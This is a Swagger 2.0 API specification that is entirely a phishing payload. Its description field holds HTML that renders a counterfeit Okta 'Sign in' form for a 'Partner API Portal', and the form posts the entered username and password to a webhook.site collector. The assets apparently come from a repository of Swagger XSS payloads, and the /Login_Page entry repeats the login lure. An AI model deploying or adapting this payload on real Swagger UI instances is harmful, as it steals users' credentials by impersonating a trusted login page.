swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI
  description: '<br><table width="100%" cellspacing="0" cellpadding="0"><tr><td width="30%">&nbsp;</td><td width="40%" bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="22"><tr><td align="left"><div align="center"><img src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/logo-okta.png" width="78" height="25" alt="okta"></div><br><font face="Segoe UI" size="5" color="#2d2d2d"><b>Sign in</b></font><br><font face="Segoe UI" size="2" color="#626262">to continue to </font><font face="Segoe UI" size="2" color="#626262"><b>Partner API Portal</b></font><br><br><form action="https://webhook.site/REPLACE-ME" method="post"><font face="Segoe UI" size="2" color="#333333"><b>Username</b></font><br><input type="text" name="email" size="34" placeholder="you@company.com"><br><br><font face="Segoe UI" size="2" color="#333333"><b>Password</b></font><br><input type="password" name="pass" size="34" placeholder="Password"><br><br><font face="Segoe UI" size="2" color="#626262">Forgot password?</font><br><input type="image" src="https://raw.githubusercontent.com/RekhanshRajput/Swagger-xss-payloads/refs/heads/main/assets/btn-okta.png" width="100" height="29" alt="Sign in"></form></td></tr></table><table width="100%" cellspacing="0" cellpadding="3"><tr><td bgcolor="#0ea5e9">&nbsp;</td></tr></table><table width="100%" cellspacing="0" cellpadding="8"><tr><td align="left"><font face="Segoe UI" size="1" color="#626262">&copy; Okta API Portal &middot; Privacy</font></td></tr></table></td><td width="30%">&nbsp;</td></tr></table><br>'
paths:
  /Login_Page:
    post:
      summary: Login here to continue
      description: Please provide your credentials to continue.
      parameters:
        - name: username
          in: formData
          description: The username for login
          required: true
          type: string
        - name: password
          in: formData
          description: The password for login
          required: true
          type: string
      tags:
        - Click here to login
      responses:
        '200':
          description: OK
        '400':
          description: Bad request
        '500':
          description: Server error
